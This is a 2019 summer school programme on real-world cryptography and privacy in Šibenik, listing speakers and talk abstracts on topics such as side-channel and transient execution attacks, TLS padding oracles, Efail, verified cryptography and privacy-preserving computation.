Summer School
June 17–21, 2019

Šibenik, Croatia
   Summer School
   on real-world crypto and privacy
Speakers

List of confirmed speakers

  • Sadia Afroz, UC Berkeley, USA
  • (Talk 1) Title: Differential treatment of web users: Tor blocking [abstract]
    (Talk 2) Title: Differential treatment of web users: regional blocking [abstract]

  • Lujo Bauer, Carnegie Mellon University, USA
  • Title: Adversarial machine learning: curiosity, benefit, or threat? [abstract]

  • Karthikeyan Bhargavan, INRIA (Paris), France
  • (Talk 1) Title: Towards High-Assurance Cryptographic Systems [abstract]
    (Talk 2) Title: Verified Cryptography for Verified Protocols [abstract]

  • Joan Daemen, Radboud University, The Netherlands
  • Title: What makes a cipher efficient? Design choices and relevant metrics [abstract]

  • Daniel Gruss, TU Graz, Austria
  • (Talk 1) Title: Introduction to Microarchitectural Attacks [abstract]
    (Talk 2) Title: Transient Execution Attacks [abstract]

  • Seda Gürses, KU Leuven, Belgium
  • (Talk 1) Title: Privacy Research Paradigms in Computer Science [abstract]
    (Talk 2) Title: POTs: The revolution will not be optimized? [abstract]

  • Annelie Heuser, CNRS (IRISA), France
  • (Talk 1) Title: Introduction to Profiled Side-channel Attacks [abstract]
    (Talk 2) Title: Recent advances in side-channel analysis using machine learning techniques [abstract]

  • Andreas Hülsing, TU Eindhoven, The Netherlands
  • (Talk 1) Title: Introduction to the theory of secret key cryptography [abstract]
    (Talk 2) Title: Hash functions in a post-quantum world [abstract]

  • Tibor Jager, Paderborn University, Germany
  • (Talk 1) Title: Real-World AKE [abstract]
    (Talk 2) Title: Public-key 0-RTT protocols [abstract]

  • Elif Bilge Kavun, The University of Sheffield, UK
  • (Talk 1) Title: Resource-efficient Cryptography for Ubiquitous Computing [abstract]
    (Talk 2) Title: Challenges in Real-world "Secure" Cryptographic Hardware Implementations [abstract]

  • Engin Kirda, Northeastern University, USA
  • (Talk 1) Title: Selected Topics in Web Security [abstract]
    (Talk 2) Title: Advanced Malware: Attacks, Defenses, and Open Challenges [abstract]

  • Anja Lehmann, IBM Research, Switzerland
  • (Talk 1) Title: Updatable Encryption & Key Rotation [abstract]
    (Talk 2) Title: Group Signatures - Concepts, New Advances and Applications [abstract]

  • Emmanuel Prouff, ANSSI, France
  • Title: Deep Learning for Embedded Security Evaluation [abstract]

  • Mariana Raykova, Google, USA
  • (Talk 1) Title: Introduction to Privacy Preserving Computation [abstract]
    (Talk 2) Title: PanORAMa: Oblivious RAM with Logarithmic Overhead [abstract]

  • Ahmad-Reza Sadeghi, TU Darmstadt, Germany
  • Title: From Smart Cities to Smart Sex Toys: A Hitchhiker’s Security & Privacy Guide to The Galaxy of Things [abstract]

  • Patrick Schaumont, Virginia Tech, USA
  • Title: Hardware Acceleration in Cryptography [abstract]

  • Benjamin Smith, INRIA and École Polytechnique, France
  • Title: Public-key cryptosystems from groups and group actions [abstract]

  • Juraj Somorovsky, Ruhr-Universität Bochum, Germany
  • (Talk 1) Title: Scalable Scanning and Automatic Classification of TLS Padding Oracle [abstract]
    (Talk 2) Title: Efail attack and its implications [abstract]

  • Gilles Van Assche, STMicroelectronics, Belgium
  • Title: Overview of the sponge, duplex and Farfalle constructions [abstract]

  • Ingrid Verbauwhede, KU Leuven, Belgium
  • Title: The need for Hardware roots of trust [abstract]

Abstracts

  • Sadia Afroz, UC Berkeley, USA
  • (Talk 1) Title: Differential treatment of web users: Tor blocking
    Abstract: One of the Internet's greatest strengths is the degree to which it facilitates access to any of its resources from users anywhere in the world. However, users receive differential treatment on the web for using anonymity networks, such as Tor and for accessing the web from certain regions. In this talk, I will discuss methodologies to measure the server-side blocking for Tor, understand why blocking happens and discuss solutions to mitigate Tor blocking.

    (Talk 2) Title: Differential treatment of web users: regional blocking
    Abstract: One of the Internet's greatest strengths is the degree to which it facilitates access to any of its resources from users anywhere in the world. However, users receive differential treatment on the web for using anonymity networks, such as Tor and for accessing the web from certain regions. In this talk, I will discuss three reasons for the closed web that are not caused by government censorship: blocking visitors from the EU to avoid GDPR compliance, blocking based upon the visitor's country, and blocking due to security concerns. These decisions can have an adverse effect on the people of the blocked regions, especially for the developing regions. With many key services, such as education, commerce, and news, offered by a small number of web-based Western companies who might not view the developing world as worth the risk, these indiscriminate blanket blocking could slow the growth of blocked developing regions.

  • Lujo Bauer, Carnegie Mellon University, USA
  • Title: Adversarial machine learning: curiosity, benefit, or threat?
    Abstract: This talk examines to what extent we should be concerned about the increasing use of machine-learning (ML) algorithms in safety- and security-critical applications. Focusing on state-of-the-art face-recognition algorithms, I will show that machine learning can be vulnerable to _physically realizable_ and _inconspicuous_ attacks, allowing attackers to evade recognition or impersonate specific people in practical settings. I will describe a systematic method to automatically generate such attacks, which are realized through printing a pair of eyeglass frames on a consumer photo printer. I will also discuss other domains where such attacks may play a role, as well as whether similar techniques can be used to help, instead of hinder, security and privacy.

  • Karthikeyan Bhargavan, INRIA (Paris), France
  • (Talk 1) Title: Towards High-Assurance Cryptographic Systems
    Abstract: Despite careful review and expert programmers, cryptographic mechanisms and their software implementations continue to be plagued by design flaws and programming bugs. In this lecture, we will study the root causes behind some of these bugs and see how formal verification can help find and prevent them. Using examples from the recent analyses of the TLS protocol, we will see how tools like ProVerif can find logical flaws in protocol designs, and how programming languages like F* can be used to build high-assurance cryptographic software. Students who wish to get a head-start are encouraged to download and install and play with ProVerif on their computers. Students who wish to survey the larger research area may also want to experiment with tools like Tamarin, EasyCrypt, and CryptoVerif.

    Download ProVerif (url), the user manual and tutorial (url)

    (Talk 2) Title: Verified Cryptography for Verified Protocols
    Abstract: We will build a verified implementation of a cryptographic algorithm in F* and compile it to portable C and WebAssembly. We will learn how to prove that our code is memory safe, functionally correct, and secret independent (“constant-time”). We will also learn how to link and deploy our verified crypto code with a larger verified codebases that implement real-world protocols like TLS or Signal. Students are encouraged to install and experiment with F* before this lecture, but the lecture will be self-containted.

    Download F* (url), and the online tutorial (url)

  • Joan Daemen, Radboud University, The Netherlands
  • Title: What makes a cipher efficient? Design choices and relevant metrics
    Abstract: In the last 25 years of the 20th century, mainstream block cipher research was focused on the design and analysis of the non-linear component in these ciphers: the S-boxes. These were seen as the single security-determining component in a block cipher. After the standardization of Rijndael as AES, the community shifted its attention to MDS mappings, mostly attempting to build MDS (or near-MDS) mappings with the lowest possible implementation cost. In the 21st century we have seen an explosion of new block ciphers, most of them borrowing building blocks and design approaches from older designs. Additionally, due to the success of the sponge and duplex constructions multiple research teams have been designing their own cryptographic permutation.

    So we are now confronted with a wide variety of block ciphers and permutations on the one hand, and a large amount of attack techniques on the other. What the vast majority of these ciphers share is that they are iterative: they consist of the repeated application of a round function. When choosing the number of rounds, one estimates the number of rounds required to provide resistant against the best known attack and one adds some rounds as a safety margin. The choice of the number of rounds is essential to strike a good compromise between efficiency and safety margin.

    Given a round function, choosing the number of rounds requires a good understanding of cryptanalysis. However, the design choices made before doing this analysis have a dramatic impact on the applicability of types of cryptanalysis. I will discuss these choices for round functions that have as non-linear step an S-box layer, often (incorrectly) called substitution-permutation networks (SPN). These choices are mainly the S-box width, state layout and alignment. To reason about these design choices, we introduce metrics for the linear part of the round function that allow to quantify its relevant properties with respect to known types of cryptanalysis.

  • Daniel Gruss, TU Graz, Austria
  • (Talk 1) Title: Introduction to Microarchitectural Attacks
    Abstract: In this talk we will learn how to build basic microarchitectural attacks. This includes side-channel attacks like Flush+Reload on the cache, and fault attacks like Rowhammer on the DRAM. We will gain a deep understanding of how these basic techniques work and see how they can be applied in more complex attacks. Some of these attacks are transient execution attacks, such as Meltdown, Spectre, and Foreshadow. We will discuss defenses against microarchitectural attacks and see which building blocks they aim to break. Yet, we will find that some attacks are not yet mitigated and several challenges around microarchitectural attacks and defenses remain unsolved, leaving an open field for future research.

    (Talk 2) Title: Transient Execution Attacks
    Abstract:In this talk we will deepen our understanding of transient execution attacks and defenses. We will discuss the differences between all the Spectre variants in terms of microarchitectural (prediction) elements, the attacker model, and the attack strategy. We will discuss blank spots that we should look at in the future.

    With this knowledge we are prepared to discuss which defenses against transient execution attacks are effective. We will see that there are good defenses, but most are neither effective nor efficient. Finally we will discuss how future defenses should be designed.

  • Seda Gürses, KU Leuven, Belgium
  • (Talk 1) Title: Privacy Research Paradigms in Computer Science
    Abstract: Since the end of the 60s, computer scientists have engaged in research on privacy and information systems. Over the years, this research has led to a whole palette of "privacy solutions". These solutions originate from diverse sub-fields of computer science, e.g., security engineering, databases, software engineering, HCI, and artificial intelligence. From a bird's eye view, all of these researchers are studying privacy. However, a closer look reveals that each community of researchers relies on different, sometimes even conflicting, definitions of privacy, and on a variety of social and technical assumptions. These researchers do have a tradition of assessing the (implicit) definitions and assumptions that underlie the studies in their respective sub-disciplines. This talk will provide a systematic overview of privacy research practice across the different computer science communities with an eye on the role they play in privacy engineering.

    (Talk 2) Title: POTs: The revolution will not be optimized?
    Abstract: The shift from packaged software and PCs to services and clouds, enabling distributed architectures that incorporate real-time feedback from users, has wide ranging implications for associated risks and the design of protective technologies. In particular, with the move to services and clouds, digital systems became layers of technologies metricized under the authority of objective functions. This means that in contract to "information systems" that focused on storage, processing and transport of information, and organizing knowledge - with associated risks of surveillance — contemporary systems leverage the knowledge they gather to not only understand the world, but also to optimize it, seeking maximum extraction of economic value through the capture and manipulation of people’s activities and environments. This ability to sense and co-create in the service of profit comes with new risks and harms such as social sorting, mass manipulation, asymmetrical concentration of resources, majority dominance, and minority erasure.

    Protective optimization technologies (POTs) are a response to optimization systems' negative effects on users and local environments. POTs analyze how events (or lack thereof) inferred, induced or shaped by optimization systems affect users and environments, then manipulate these events to influence system outcomes, e.g., by altering the optimization constraints and poisoning system inputs. During this talk I will describe optimization systems, demonstrate problems associated with these systems, and how POTs can protect users against these.

  • Annelie Heuser, CNRS (IRISA), France
  • (Talk 1) Title: Introduction to Profiled Side-channel Attacks
    Abstract:In this talk, we will learn about side-channel analysis of embedded devices and recap classical profiled side-channel attacks. Nowadays, embedded devices are often performing security, privacy, and/or security-critical tasks. In this talk, we show how to reveal sensitive information using power consumption or electromagnetic emanation even when protected with cryptographic primitives. Special attention will be given to profiled attacks, where the assumption is made that an attacker is able to retrieve additional information in a learning phase from a similar device like the one under attack. We will detail classical profiled side-channel attacks as the template attacks and the stochastic approach using practical examples.

    (Talk 2) Title: Recent advances in side-channel analysis using machine learning techniques
    Abstract: The core problem faced in side-channel analysis can be translated into common problems given in classical tasks for machine learning. It is therefore natural to use and exploit standard machine learning techniques to reveal sensitive data using side-channel information.

    In this talk, we will discuss recent advances made in the field of side-channel analysis using machine learning and deep learning techniques. This includes reshaping the underlying side-channel scenario with semi-supervised techniques, discussing evaluation metrics, and enhancing side-channel classification techniques.

  • Andreas Hülsing, TU Eindhoven, The Netherlands
  • (Talk 1) Title: Introduction to the theory of secret key cryptography
    Abstract: This lecture will revisit the basic primitives in secret key cryptography: secret key encryption, cryptographic hash functions, pseudorandom functions and message authentication codes. The lecture will cover the most relevant security notions and generic constructions.

    (Talk 2) Title: Hash functions in a post-quantum world
    Abstract:This talk will discuss several aspects of the theory of cryptographic hash functions that suddenly change when considering adversaries equipped with a quantum computer. For example, previous results on the conventional hardness of certain security properties do not apply or conventional security properties might not be sufficient anymore. The talk will cover bounds on the quantum hardness of traditional hash function properties as well as new quantum-security properties for hash-functions. Afterwards, the talk will move on to a new conventional security notion for hash functions that is motivated by applications in the post-quantum world.

  • Tibor Jager, Paderborn University, Germany
  • (Talk 1) Title: Real-World AKE
    Abstract: This lecture will given an overview of real-world authenticated key exchange protocols. We will cover basic protocols and security properties, such as Forward Security. Then we give an overview of TLS, considering in particular the most recent version 1.3. We explain different design decisions, discuss novel features such as the 0-RTT mode that minimizes latency, and point to potential weaknesses, such as replay attacks and vulnerabilities in applications with backwards compatibility requirements.

    (Talk 2) Title: Public-key 0-RTT protocols
    Abstract: Reducing latency overhead while maintaining critical security guarantees, such as forward secrecy, has become a major design goal for modern key exchange protocols, both in academia and industry. Of particular interest in this regard are 0-RTT protocols, a class of KE protocols which allow a client to send cryptographically protected payload in "zero round-trip times" (0-RTT) along with the very first KE protocol message, thereby minimizing latency. Prominent examples are Google's QUIC protocol, Facebook's Zero protocol, and the recent TLS version 1.3. The main challenge in a 0-RTT key exchange is to achieve forward secrecy and security against replay attacks for the very first payload message. Originally, this was believed to be impossible, but more recently it was shown that this belief is actually false. This lecture explains techniques to construct secure 0-RTT protocols, which may have interesting applications beyond key exchange, for instance to forward-secure instant messaging.

  • Elif Bilge Kavun, The University of Sheffield, UK
  • (Talk 1) Title: Resource-efficient Cryptography for Ubiquitous Computing
    Abstract: Compactness and mobility of very small-scale computing devices allow them to be deployed "pervasively" – such as in smart homes, logistics, e-commerce, and medical technology. Embedding these devices into everyday objects also indicates the realization of the foreseen "ubiquitous computing" concept. However, this in turn brought some concerns - especially, security and privacy.

    For ubiquitous computing, the adversary model and the security level is not the same as in traditional applications due to limited resources in pervasive devices – area, power, and energy are actually harsh constraints for such devices. Unfortunately, the existing cryptographic solutions are generally quite heavy for these ubiquitous applications. In order to address the security problem of the resource-constrained devices, "lightweight cryptography" has been defined nearly two decades ago and many different lightweight cryptographic primitives have already been proposed. Initial studies mostly dealt with hardware cost reduction. However, this is not the only important metric for such devices. Depending on the application, resource-constrained devices may need lightweight ciphers to be executed in one clock cycle, which still achieve a certain security level and a small footprint. Furthermore, as most of the pervasive computing applications are implemented in software on embedded microcontrollers, there is also a need for lightweight ciphers that result in efficient code size and execution time.

    In this talk, lightweight cryptography is understood as "resource-efficient cryptography". First, existing lightweight ciphers focusing on low-area will be introduced. Following that, other "resource-efficient" cipher solutions for resource-constrained devices addressing the mentioned gaps in lightweight cryptography will be explained. Finally, implementation techniques and cipher proposals towards "side-channel protected" resource-efficient cryptography will be presented.

    (Talk 2) Title: Challenges in Real-world "Secure" Cryptographic Hardware Implementations:
    Abstract: Physical attacks against cryptographic hardware implementations have been very powerful to reveal the secret information of cryptographic devices. These attacks can be active or passive - in other words, listening the side-channel information of the device or invasively/semi-invasively (and sometimes even non-invasively) faulting the behavior of the device in order to gather the secret.

    Many techniques have been proposed against these attacks; for example, masking is the most straightforward technique against side-channel attacks and redundancy is a very common technique against fault attacks. In a "real-world" cryptographic hardware, one has to protect the device from all of these attacks. This means implementing different countermeasures at the same time, which in turn can bring conflicts and as well cost problems. For instance, many masking techniques against side-channel attacks require fresh-randomness in every clock cycle in addition to mask shares which means that a large amount of randomness has to be generated on the chip. Furthermore, security-critical parts of the device have to be implemented redundantly against fault attacks.

    Many devices and applications cannot afford the large area and high power consumption caused by implementing all these countermeasures at the same time. Sometimes, it is even too complex for the synthesizer to compile and optimize the implementation successfully. Furthermore, in order to make sure that one countermeasure does not conflict with another one, security verification has to be performed repeatedly before silicon, which is a time-consuming process.

    In this talk, such challenges will be presented not only from an academic view, but also from an industry perspective. Some practical solutions will be presented and the countermeasures in the literature addressing both active and passive attacks will be explained.

  • Engin Kirda, Northeastern University, USA
  • (Talk 1) Title: Selected Topics in Web Security
    Abstract: Although much research work has been done on analyzing, detecting, and mitigating malware, it still remains one of the most pressing problems on the Internet today. Unfortunately, malware is often a component in most of the cyber-attacks we are observing against organizations. This lecture will be giving an overview on advanced malware, and will be discussing some of the current attacks, the defenses that are in place (including their strengths and weaknesses), and the current open challenges that the research community is facing.

    (Talk 2) Title: Advanced Malware: Attacks, Defenses, and Open Challenges
    Abstract: Attacks against web applications are very common on the Internet, and miscreants often target web applications to gain an initial cyber-foothold in an organization. This lecture aims to discuss some practical, current topics in web security. It will discuss a number of problems, the solutions that have been proposed, and some open research challenges that remain.

  • Anja Lehmann, IBM Research, Switzerland
  • (Talk 1) Title: Updatable Encryption & Key Rotation
    Abstract: An updatable encryption scheme allows to periodically rotate the encryption key and move already existing ciphertexts from the old to the new key. Rotation of the encryption key is a common requirement in practice in order to mitigate the impact of key compromises over time. The ciphertext updates are done with the help of a so-called update token and can be performed by an untrusted party, as the update never decrypts the data. Updatable encryption is particularly useful in settings where encrypted data is outsourced, e.g., stored on a cloud server. The data owner can produce an update token, and the cloud server can update the ciphertexts. I'll give an overview of the different types of updatable encryption schemes, their desirable security properties and provably-secure instantiations.

    (Talk 2) Title: Group Signatures - Concepts, New Advances and Applications
    Abstract: Group signatures allow members of a group to anonymously produce signatures on behalf of the group. They are an important building block for privacy-enhancing applications, e.g., enabling user data to be collected in authenticated form while preserving the user's privacy. I'll give an introduction into the area of group signatures and related concepts, and also discuss two recent results: First, I'll present a new approach for managing the linkability between group signatures in a flexible manner which plays a crucial role for balancing utility ad privacy. Second, I'll discuss the application of group signatures for vehicle-to-vehicle (V2V) communication systems that are currently being prepared for real-world deployment, but face strong opposition over privacy issues.

  • Emmanuel Prouff, ANSSI, France
  • Title: Deep Learning for Embedded Security Evaluation
    Abstract: To provide insurance on the resistance of a system against side-channel analysis, several national or private schemes are today promoting an evaluation strategy, common in classical cryptography, which is focussing on the most powerful adversary who may train to learn about the dependency between the device behaviour and the sensitive data values. Several works have shown that this kind of analysis, known as Template Attacks in the side-channel domain, can be rephrased as a classical Machine Learning classification problem with learning phase. Following the current trend in the latter area, recent works have demonstrated that deep learning algorithms were very efficient to conduct security evaluations of embedded systems and had many advantages compared to the other methods. During the proposed presentation, I will come back on these recent works and will identify some avenues for further research on this topic.

  • Mariana Raykova, Yale University, USA
  • (Talk 1) Title: Introduction to Privacy Preserving Computation
    Abstract: This talk will introduce the concept of privacy preserving computation, which considers data privacy guarantees beyond protecting data at rest and in transit, and focuses on the more challenging goal of protecting private data while computing on it. I will cover some basic formal security definitions and the corresponding cryptographic primitives that aim to achieve them. I will focus on the notions of secure multiparty computation and zero knowledge proofs. I will cover some basic techniques for constructions of these tools as well as overview of what is possible to achieve today with existing constructions from practical perspective.

    (Talk 2) Title: PanORAMa: Oblivious RAM with Logarithmic Overhead
    Abstract: We present PanORAMa, the first Oblivious RAM construction that achieves communication overhead O(logN⋅loglogN) for database of N blocks and for any block size B=Ω(logN) while requiring client memory of only a constant number of memory blocks. Our scheme is only an O(loglogN) factor away from the Ω(logN) lower bound shown by Larsen and Nielsen [CRYPTO '18].

    Our construction follows the hierarchical approach to ORAM design and relies on two main building blocks of independent interest: a new oblivious hash table construction with improved amortized O(logN+poly(loglogλ)) communication overhead for security parameter λ and N=poly(λ), assuming its input is randomly shuffled; and a complementary new oblivious random multi-array shuffle construction, which shuffles N blocks of data with communication O(Nloglogλ+NlogNlogλ) when the input has a certain level of entropy. We combine these two primitives to improve the shuffle time in our hierarchical ORAM construction by avoiding heavy oblivious shuffles and leveraging entropy remaining in the merged levels from previous shuffles. As a result, the amortized shuffle cost is asymptotically the same as the lookup complexity in our construction.

    This is a joint work with Sarvar Patel, Giuseppe Persiano and Kevin Yeo.

  • Ahmad-Reza Sadeghi, TU Darmstadt, Germany
  • Title: From Smart Cities to Smart Sex Toys: A Hitchhiker’s Security & Privacy Guide to The Galaxy of Things
    Abstract: The Internet of Things (IoT) is rapidly emerging to the Internet of Everything, constantly growing by new device manufacturers that are entering the market of internet-connected appliances for smart cities, homes, offices, etc.. The appliances combine smart devices (ranging from motion sensors and traffic lights to virtual voice assistants) and smart services, including the almost invisible backend infrastructure (e.g., cloud/relay/update servers, etc.), all of which eagerly collecting users’ data.

    However, due to lack of security by design and flawed implementations we are facing significant security and privacy challenges specific to IoT, such as perilous IoT botnet attacks, new privacy threats caused by widespread installation of wireless sensors, actuators and smart environment appliances even in the highly private setting of our homes - not even smart sex toys are safe. Unfortunately, standard security measures like encrypted communications do not protect against many of these threats.

    The massive scale of the IoT device population and enormous diversity of device hardware, operating systems, software frameworks, protocols, and manufacturers makes it almost impossible to establish standards for IoT security and privacy-protecting solutions. Even worse simply applying and extending known solutions, neither for per-device security architectures nor for network security measures, are sufficient to secure the IoT. In particular, existing intrusion detection techniques seem ineffective to detect compromised IoT devices.

    In this talk, we present a compact overview of various attacks on IoT systems and recent works (including ours) on addressing the diverse security and privacy challenges in the growing IoT landscape. In particular, we focus on approaches for automated device identification and reliable detection of compromised devices based on their inherent communication behavior. In this context we may use other buzzwords like (adversarial) machine learning, and if time allows, even blockchains.

  • Patrick Schaumont, Virginia Tech, USA
  • Title: Hardware Acceleration in Cryptography
    Abstract: Although the bulk of information security is driven by software, the hardware implementation of cryptography can still be essential to meet performance and energy efficiency constraints. The specialized structures of a hardware implementation lead to highly energy-efficient design. This improves the battery life of mobile applications, and it reduces the power consumption of high-performance cloud applications.

    The objective of hardware-accelerated cryptography is to integrate specialized hardware seamlessly into a system application with minimal overhead. Additional considerations include proper isolation of hardware-based secrets from unauthorized access, as well as the protection of those secrets against specific hardware attacks.

    We discuss various form factors for hardware/software interfaces that integrate hardware crypto modules into the system software. We describe loosely-coupled memory-mapped structures and tightly-coupled custom-instructions. Next, we discuss techniques that are used to transform sequential algorithms into parallel architectures, and we consider the application of those techniques to the hardware acceleration of cryptography.

    Throughout the talk, we illustrate the design concepts with examples of hardware acceleration of secret-key and public-key cryptography.

  • Benjamin Smith, INRIA and École Polytechnique, France
  • Title: Public-key cryptosystems from groups and group actions
    Abstract: This talk will begin setting out the common background in public-key cryptography required throughout the rest of the school. We will focus on key exchange and signatures, the most fundamental problems, taking our examples from the simplest classical arena: group-based cryptography, where security is predicated on the supposed hardness of the Discrete Logarithm Problem. We will describe not only the "textbook" versions of basic protocols in elliptic curve cryptography, but also the most efficient variants used in real-world cryptosystems today. If time permits, we will briefly show one way to take these protocols forward into a post-quantum future where discrete logarithms are easy: group-action and isogeny-based cryptography.

  • Juraj Somorovsky, Ruhr-Universität Bochum, Germany
  • (Talk 1) Title: Scalable Scanning and Automatic Classification of TLS Padding Oracle Vulnerabilities
    Abstract: The TLS protocol provides encryption, data integrity, and authentication on the modern Internet. Despite the protocol's importance, currently-deployed TLS versions use obsolete cryptographic algorithms which have been broken using various attacks. One prominent class of such attacks is CBC padding oracle attacks. These attacks allow an adversary to decrypt TLS traffic by observing different server behaviors which depend on the validity of CBC padding.

    We present the first large-scale scan for CBC padding oracle vulnerabilities in TLS implementations on the modern Internet. Our scan revealed vulnerabilities in 1.83 of the Alexa Top Million websites, detecting nearly 100 different vulnerabilities. Our scanner observes subtle differences in server behavior, such as responding with different TLS alerts, or with different TCP header flags.

    We used a novel scanning methodology consisting of three steps. First, we created a large set of probes that detect vulnerabilities at a considerable scanning cost. We then reduced the number of probes using a preliminary scan, such that a smaller set of probes has the same detection rate but is small enough to be used in large-scale scans. Finally, we used the reduced set to scan at scale, and clustered our findings with a novel approach using graph drawing algorithms.

    Contrary to common wisdom, exploiting CBC padding oracles does not necessarily require performing precise timing measurements. We detected vulnerabilities that can be exploited simply by observing the content of different server responses. These vulnerabilities pose a significantly larger threat in practice than previously assumed.

    The talk is based on our papers published at USENIX Security 2018 and 2019.

    (Talk 2) Title: Efail attack and its implications
    Abstract: OpenPGP and S/MIME are the two prime standards for providing end-to-end security for emails. We describe novel attacks built upon a technique we call malleability gadgets to reveal the plaintext of encrypted emails. We use CBC/CFB gadgets to inject malicious plaintext snippets into encrypted emails that abuse existing and standard conforming backchannels, for example, in HTML, CSS, or x509 functionality, to exfiltrate the full plaintext after decryption. The attack works for emails even if they were collected long ago, and is triggered as soon as the recipient decrypts a single maliciously crafted email from the attacker.

    We devise working attacks for both OpenPGP and S/MIME encryption, and show that exfiltration channels exist for 23 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients. While it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext.

    In addition to the attacks on encryption schemes in OpenPGP and S/MIME, we give an overview of our current work targetting email signatures. We present several techniques to spoof signed emails on different levels.

    The talk is based on our papers published at USENIX Security 2018 and 2019.

  • Gilles Van Assche, STMicroelectronics, Belgium
  • Title: Overview of the sponge, duplex and Farfalle constructions
    Abstract: In this presentation, we introduce the sponge construction that allows one to build an extendable output function (XOF) from a cryptographic permutation. Starting from this point, we then explore different variants along two axes. On the first axis, we highlight the differences in security when used for hashing (unkeyed) or for encryption and authentication (keyed). And on the second axis, we show how to add incremental input properties, using the duplex constructions and variants. We also set the stage with the indifferentiability and the indistinguishability frameworks for unkeyed and keyed applications, respectively. Finally, we explore the permutation-based Farfalle construction as a way to build an efficient deck function from permutation components.

  • Ingrid Verbauwhede, KU Leuven, Belgium
  • Title: The need for Hardware roots of trust
    Abstract: Software security and cryptographic security protocols rely on hardware roots of trust. Software designers assume that cryptographic keys, random initial values, nonces, freshness, hardware isolation, or secure storage is simply available to them. At the same time, electronics shrink: sensor nodes, IOT devics, smart devices are becoming more and more available. Adding security and cryptography to these often very resource constraint devices is a challenge. This presentation will focus design methods for hardware roots of trustor and more specifically on Physically Unclonable Functions (PUFs) and True Random Number Generators (TRNG), two essential roots of trust.